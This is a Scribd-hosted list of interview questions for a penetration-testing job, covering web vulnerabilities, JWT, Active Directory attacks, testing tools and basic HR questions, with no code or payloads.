Scribd
Upload
311 views3 pages

VAPT Interview Questions-1

i

Uploaded by

amarjeetandkumar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
311 views3 pages

VAPT Interview Questions-1

i

Uploaded by

amarjeetandkumar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Interview Questions

Different types of encryptions


Difference between encoding and encryption
Explain SSL & TLS
Difference between HTTP & HTTPS
Different types of methods and use cases
Name HTTP headers and the use cases
How is HTTP body and Headers differentiated in a request
What is cookie & its uses.
What is the use of CSRF Token
Tools you have used.
Questions on burp suite
OWASP TOP 10 WEB
Question on projects and difficulties faced during the development
phase.
Difference between CSRF & SSRF
Can we perform a CSRF attack against JSON request?
What is DNS Zone Transfer?
Name the attacks against OAuth mechanism?
Can an XXE be performed against a Excel File Upload?
What is Cross-site WebSocket Hijacking?
How can CSP protect against LFI?
Can we perform injection attacks against JWT?
Is JWT stateful or stateless?
What is your methodology to identify SSTI?
What is SSTI polyglot?
What is CRLF injection and how can it be used to get open URL
redirection?
Common Source and Sinks for DOM based XXS
What is CORS Policy and what prerequisites are needed to exploit
CORS misconfigurations?
What kind of attacks can be performed against JWT
What is blind SQL injection and how can we exploit it?
Explain Race condition with a valid example.
Explain Mass Assignment with a valid example.
The cloud config review you performed are based on which
benchmarks?
Prowler or Scout Suite which tool do you prefer and why?
Questions on Vulnerabilities:
SSRF
IDOR
XXE
XXS
Prototype Pollution
Working of SSH
Network Pentesting & Active directory questions if you mention you
know about it during the interview
Tools used in Network PT
Nmap and its use
Have you used Nessus
Authentication in AD
Golden Ticket attack
What is a Forest in AD
Remaining technical question depend on your CV
Basic MR & HR questions:
Who is the CEO of company
Why do want to work in company
How and where did you learn about cyber security
What is your biggest achievement in current company?
Tell me about a critical severity vulnerability you discovered
during your time at current company?
Will you be able to relocate

You might also like